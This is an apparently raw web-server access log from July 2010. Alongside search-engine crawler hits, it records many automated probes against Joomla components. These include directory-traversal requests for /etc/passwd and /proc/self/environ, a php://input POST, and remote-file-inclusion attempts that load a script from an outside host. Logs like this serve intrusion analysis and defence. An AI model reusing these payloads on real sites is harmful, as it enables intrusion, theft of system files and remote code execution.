188.127.248.175 - - [27/Jul/2010:18:42:37 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:42:37 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:42:38 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
67.195.112.178 - - [27/Jul/2010:18:51:40 +0200] "GET / HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
92.43.201.28 - - [27/Jul/2010:19:04:41 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:19:04:43 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:19:05:50 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:19:05:50 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:19:05:50 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:19:06:00 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:19:06:01 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:19:06:01 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:19:06:07 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:19:06:07 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
125.141.91.138 - - [27/Jul/2010:19:06:30 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:19:11:50 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:19:11:51 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:19:11:51 +0200] "GET //index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
220.125.208.51 - - [27/Jul/2010:19:11:52 +0200] "POST //index.php?option=com_gcalendar&controller=php://input HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
208.80.193.38 - - [27/Jul/2010:19:17:26 +0200] "GET / HTTP/1.0" 200 559 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; ESB{182311D9-B95C-499B-A3AA-D275B80D1D45}; ESB{330CC175-CFAC-4875-BA5E-8FB31F15996F}; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; yplus 5.1.04b)"
217.16.18.219 - - [27/Jul/2010:19:26:37 +0200] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:26:37 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:27:02 +0200] "GET /logs/index.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:27:02 +0200] "GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:27:07 +0200] "GET /logs/index.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:27:08 +0200] "GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:27:16 +0200] "GET /logs/index.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:27:16 +0200] "GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:27:17 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:27:17 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:28:09 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:28:10 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:28:40 +0200] "GET /logs/index.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:28:41 +0200] "GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:30:05 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:30:05 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
74.55.73.74 - - [27/Jul/2010:19:30:11 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
81.21.78.22 - - [27/Jul/2010:19:30:33 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
74.55.73.74 - - [27/Jul/2010:19:30:45 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
217.16.18.219 - - [27/Jul/2010:19:30:55 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:30:56 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
81.21.78.22 - - [27/Jul/2010:19:32:12 +0200] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:19:32:12 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:19:32:20 +0200] "GET /logs/access_log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:19:32:20 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:19:32:20 +0200] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
74.55.73.74 - - [27/Jul/2010:19:33:46 +0200] "GET /logs/access_log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:19:33:46 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:19:33:46 +0200] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:19:35:50 +0200] "GET /logs/access_log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:19:35:50 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:19:35:51 +0200] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
125.141.91.138 - - [27/Jul/2010:19:43:26 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:19:43:27 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:19:43:27 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
157.181.180.23 - - [27/Jul/2010:19:43:32 +0200] "GET /akocomments.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
157.181.180.23 - - [27/Jul/2010:19:43:32 +0200] "GET /logs/akocomments.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
157.181.180.23 - - [27/Jul/2010:19:43:32 +0200] "GET /logs/access_log%20%20/akocomments.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 319 "-" "Mozilla/5.0"
64.150.180.136 - - [27/Jul/2010:19:44:59 +0200] "GET /?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.810"
195.168.25.206 - - [27/Jul/2010:19:45:10 +0200] "GET /?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
195.168.25.206 - - [27/Jul/2010:19:45:13 +0200] "GET /?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:49:11 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:19:49:11 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:19:50:05 +0200] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
93.158.148.30 - - [27/Jul/2010:19:50:07 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
94.23.215.207 - - [27/Jul/2010:19:56:04 +0200] "GET /akocomments.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
94.23.215.207 - - [27/Jul/2010:19:56:04 +0200] "GET /logs/akocomments.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
94.23.215.207 - - [27/Jul/2010:19:56:04 +0200] "GET /logs/access_log/akocomments.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
195.168.25.206 - - [27/Jul/2010:19:57:34 +0200] "GET /logs/access_log/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
195.168.25.206 - - [27/Jul/2010:19:57:34 +0200] "GET /logs/access_log/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
195.168.25.206 - - [27/Jul/2010:19:57:34 +0200] "GET /?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
195.168.25.206 - - [27/Jul/2010:19:57:34 +0200] "GET /?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
195.168.25.206 - - [27/Jul/2010:19:57:35 +0200] "GET /logs/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
195.168.25.206 - - [27/Jul/2010:19:57:35 +0200] "GET /logs/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
64.150.180.136 - - [27/Jul/2010:19:57:44 +0200] "GET /logs/access_log/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
64.150.180.136 - - [27/Jul/2010:19:57:45 +0200] "GET /?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.810"
64.150.180.136 - - [27/Jul/2010:19:57:45 +0200] "GET /logs/?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.810"
125.141.91.138 - - [27/Jul/2010:19:57:50 +0200] "GET /logs/access_log//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:19:57:51 +0200] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:19:57:51 +0200] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:20:02:14 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:20:02:14 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:20:02:51 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:20:02:51 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:20:03:25 +0200] "GET /logs/*option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:20:03:25 +0200] "GET /*option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 383 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:20:03:27 +0200] "GET /logs/*option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:20:03:27 +0200] "GET /logs/*option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:20:03:27 +0200] "GET /*option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 383 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:20:03:27 +0200] "GET /*option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 383 "-" "libwww-perl/5.805"
157.181.180.23 - - [27/Jul/2010:20:10:28 +0200] "GET /logs/access_log/akocomments.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
178.63.10.52 - - [27/Jul/2010:20:12:15 +0200] "GET //xmlrpc.php HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
207.46.13.86 - - [27/Jul/2010:20:15:28 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.86 - - [27/Jul/2010:20:16:30 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.147.62.92 - - [27/Jul/2010:20:16:38 +0200] "GET //xmlrpc.php HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
98.130.2.13 - - [27/Jul/2010:20:19:19 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:20:19:19 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:20:21:23 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:20:25:42 +0200] "GET /logs/access_log/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:20:25:42 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:20:25:42 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
178.63.10.52 - - [27/Jul/2010:20:32:55 +0200] "GET /logs/access_log//xmlrpc.php HTTP/1.1" 404 313 "-" "libwww-perl/5.823"
178.63.10.52 - - [27/Jul/2010:20:32:55 +0200] "GET //xmlrpc.php HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
178.63.10.52 - - [27/Jul/2010:20:32:56 +0200] "GET /logs//xmlrpc.php HTTP/1.1" 404 302 "-" "libwww-perl/5.823"
178.63.10.52 - - [27/Jul/2010:20:36:05 +0200] "GET /logs/error_log//xmlrpc.php HTTP/1.1" 404 312 "-" "libwww-perl/5.823"
92.43.201.28 - - [27/Jul/2010:20:43:06 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:20:43:07 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
203.147.62.92 - - [27/Jul/2010:20:43:07 +0200] "GET /logs/access_log//xmlrpc.php HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:20:43:07 +0200] "GET //xmlrpc.php HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
